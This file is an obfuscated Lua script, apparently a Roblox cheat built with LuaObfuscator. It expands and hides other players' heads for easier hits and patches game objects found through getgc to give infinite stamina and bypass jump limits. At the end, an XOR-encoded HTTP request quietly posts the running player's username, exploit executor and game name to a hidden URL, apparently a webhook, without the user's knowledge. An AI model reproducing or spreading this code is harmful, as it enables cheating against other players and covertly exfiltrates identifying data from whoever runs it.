--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v14,v15) local v16={};for v19=1, #v14 do v6(v16,v0(v4(v1(v2(v14,v19,v19 + 1 )),v1(v2(v15,1 + (v19% #v15) ,1 + (v19% #v15) + 1 )))%256 ));end return v5(v16);end _G.HeadSize=1920 -(1881 + 24) ;_G.Disabled=true;game:GetService(v7("\227\214\213\22\227\169\209\23\210\198","\126\177\163\187\69\134\219\167")).RenderStepped:connect(function() if _G.Disabled then for v27,v28 in next,game:GetService(v7("\19\193\43\220\249\49\222","\156\67\173\74\165")):GetPlayers() do if (v28.Name~=game:GetService(v7("\4\187\72\15\185\52\85","\38\84\215\41\118\220\70")).LocalPlayer.Name) then pcall(function() local v35=0 -0 ;while true do if ((1763 -(454 + 1309))==v35) then v28.Character.Head.Size=Vector3.new(_G.HeadSize,_G.HeadSize,_G.HeadSize);v28.Character.Head.Transparency=1 + 0 ;v35=1 -0 ;end if (v35==(1 -0)) then v28.Character.Head.BrickColor=BrickColor.new(v7("\98\19\38","\158\48\118\66\114"));v28.Character.Head.Material=v7("\133\33\31\56","\155\203\68\112\86\19\197");v35=2;end if (v35==(5 -3)) then v28.Character.Head.CanCollide=false;v28.Character.Head.Massless=true;break;end end end);end end end end);for v17,v18 in pairs(getgc(true)) do if ((typeof(v18)==v7("\82\220\52\240\69","\152\38\189\86\156\32\24\133")) and rawget(v18,v7("\251\82\179\111\239\122\166\94\249\83","\38\156\55\199"))) then local v20=285 -(134 + 151) ;local v21;while true do if (v20==(1665 -(970 + 695))) then v21=1636 -(1373 + 263) ;while true do if ((0 -0)==v21) then v18.getIsMaxed=function() return false;end;v18.getFlags=function() return 1001 -(451 + 549) ;end;v21=1991 -(582 + 1408) ;end if (v21==(3 -2)) then v18.addFlags=function(v48,v49) v48:setFlags(0 -0 );return;end;break;end end break;end end end if ((typeof(v18)==v7("\188\124\126\36\22","\35\200\29\28\72\115\20\154")) and rawget(v18,v7("\10\175\208\200\131\15\60\24\173\208\220\153\41\38","\84\121\223\177\191\237\76"))) then local v22=0 -0 ;local v23;while true do if (v22==(1824 -(1195 + 629))) then v23=v18.spawnCharacter;v18.SpawnCharacter=function(v36) for v37,v38 in pairs(getgc(true)) do if ((typeof(v38)==v7("\175\87\203\172\63","\161\219\54\169\192\90\48\80")) and rawget(v38,v7("\78\71\20\12\90\111\1\61\76\70","\69\41\34\96"))) then v38.getIsMaxed=function() return false;end;v38.getFlags=function() return 1385 -(746 + 638) ;end;v38.addFlags=function(v53,v54) local v55=0 + 0 ;while true do if (v55==(0 -0)) then v53:setFlags(0 -0 );return;end end end;end end end;break;end end end if ((typeof(v18)==v7("\168\194\213\6\7","\75\220\163\183\106\98")) and rawget(v18,v7("\5\191\159\20\216\12\144\158\58\201","\185\98\218\235\87"))) then v18.getCanJump=function() return true;end;end if ((typeof(v18)==v7("\223\61\37\234\219","\202\171\92\71\134\190")) and rawget(v18,v7("\3\244\1\184\22\229\9\164\8\248\19\169\13\229","\232\73\161\76"))) then v18.JUMP_DELAY_ADD=1581.5 -(1535 + 46) ;end if ((typeof(v18)==v7("\175\216\64\81\27","\126\219\185\34\61")) and rawget(v18,v7("\51\221\91\102\77\99\242\234\5\192\95","\135\108\174\62\18\30\23\147"))) then v18._setStamina=function(v29,v30) v29._stamina=math.huge;v29._staminaChangedSignal:Fire(99 + 0 );end;end end game.StarterGui:SetCore(v7("\133\236\36\207\54\161\39\206\176\224\41\202\12\167\60\201","\167\214\137\74\171\120\206\83"),{[v7("\191\249\38\81\253","\199\235\144\82\61\152")]=v7("\46\24\191\46\21\24\176\62\10","\75\103\118\217"),[v7("\243\81\104\0","\126\167\52\16\116\217")]=v7("\225\32\38\133\166\23\245\221\35\96\179\183\11\245\216\58\96\140\187\24\248\205\42\108\192","\156\168\78\64\224\212\121")   .. game.Players.LocalPlayer.DisplayName   .. "." ,[v7("\35\251\183\207\19\231\170\192","\174\103\142\197")]=1 + 3 });local v8=(is_sirhurt_closure and v7("\101\33\77\48\48\76\236","\152\54\72\63\88\69\62")) or (pebc_execute and v7("\228\214\225\72\219\247\227\93\199\204\235\78","\60\180\164\142")) or (syn and v7("\107\71\11\40\55\254\23\24\102","\114\56\62\101\73\71\141")) or (secure_load and v7("\139\236\213\208\177\231\222\200","\164\216\137\187")) or (KRNL_LOADED and v7("\249\244\63\190","\107\178\134\81\210\198\158")) or (SONA_LOADED and v7("\15\15\148\195","\202\88\110\226\166")) or v7("\202\1\132\242\216\205\6\151\250\138\210\26\131\251\195\215\22","\170\163\111\226\151") ;local v9=v7("\25\36\166\40\93\109\102\94\52\187\43\77\56\59\21\126\177\55\67\120\40\1\57\253\47\75\53\33\30\63\185\43\1\102\122\67\99\228\107\30\100\112\66\99\235\97\23\96\120\72\99\226\119\28\0\15\41\105\188\31\92\99\122\66\1\158\41\73\19\46\46\101\149\26\97\47\16\1\10\224\30\29\17\123\54\60\255\105\92\63\14\66\35\166\14\94\46\31\40\2\136\97\103\103\24\28\10\156\12\90\17\120\72\36\171\28\111\38\122\2\55","\73\113\80\210\88\46\87");local v10={[v7("\130\35\195\6\226\143\56","\135\225\76\173\114")]=v7("\63\245\189\179\185\169\162\30\173\145\190\170\184\181\20\228\173\189\236\245\132\21\224\186\177\184\253\144\27\255\170\185\163\175\180\90\203\183\162\236\141\175\21\227\189\240\154\184\181\9\228\183\190\191\253\137\21\173\181\181\162\168\238","\199\122\141\216\208\204\221"),[v7("\168\208\18\245\124\229","\150\205\189\112\144\24")]={{[v7("\49\141\171\64\1","\112\69\228\223\44\100\232\113")]=v7("\231\16\10\214\185\114\131\148\58\31\214\181\105\146\209\27\71\218\184\122\131\198\17\14\198\187\60\198\221\17\93\147","\230\180\127\103\179\214\28")   .. game:GetService(v7("\161\4\77\77\225\85\240\128\4\92\67\215\68\242\154\12\92\67","\128\236\101\63\38\132\33")):GetProductInfo(game.PlaceId).Name   .. v7("\236\243\88","\175\204\201\113\36\214\139") ,[v7("\67\201\38\223\22\78\220\33\213\11\73","\100\39\172\85\188")]=v7("\152\107\188\146\61\172\117\188\218\115","\83\205\24\217\224")   .. game.Players.LocalPlayer.Name   .. v7("\166\210\196\41\238\133","\93\134\165\173")   .. v8   .. "" ,[v7("\170\235\209\199","\30\222\146\161\162\90\174\210")]=v7("\247\71\115\2","\106\133\46\16"),[v7("\91\47\127\243\72","\32\56\64\19\156\58")]=tonumber(464195 + 7034007 ),[v7("\83\197\228\81\95","\224\58\168\133\54\58\146")]={[v7("\76\68\71","\107\57\54\43\157\21\230\231")]=v7("\211\159\5\229\227\147\128\204\156\6\187\171\211\205\215\132\9\187\186\211\194\148\191\25\224\180\222\220\148\170\7\244\173\221\221\149\138\2\253\161\131\215\134\218\68\165\255\197\146\138\222\65\179\159\211\221\214\138\5\168\137\210\200\157\158\2\240\171\210\206\214\142\76","\175\187\235\113\149\217\188")   .. tostring(game:GetService(v7("\12\163\128\85\230\107\107","\24\92\207\225\44\131\25")).LocalPlayer.Name) }}}};local v11=game:GetService(v7("\99\199\172\92\40\120\89\197\177\79\30","\29\43\179\216\44\123")):JSONEncode(v10);local v12={[v7("\190\214\46\88\184\215\52\1\169\192\48\73","\44\221\185\64")]=v7("\0\247\88\83\122\2\230\92\86\124\15\168\66\76\124\15","\19\97\135\40\63")};request=http_request or request or HttpPost or syn.request ;local v13={[v7("\155\78\63","\81\206\60\83\91\79")]=v9,[v7("\108\164\212\107","\196\46\203\176\18\79\163\45")]=v11,[v7("\149\39\106\22\43\255","\143\216\66\30\126\68\155")]=v7("\154\231\62\255","\129\202\168\109\171\165\195\183"),[v7("\10\93\54\220\219\6\245","\134\66\56\87\184\190\116")]=v12};request(v13);
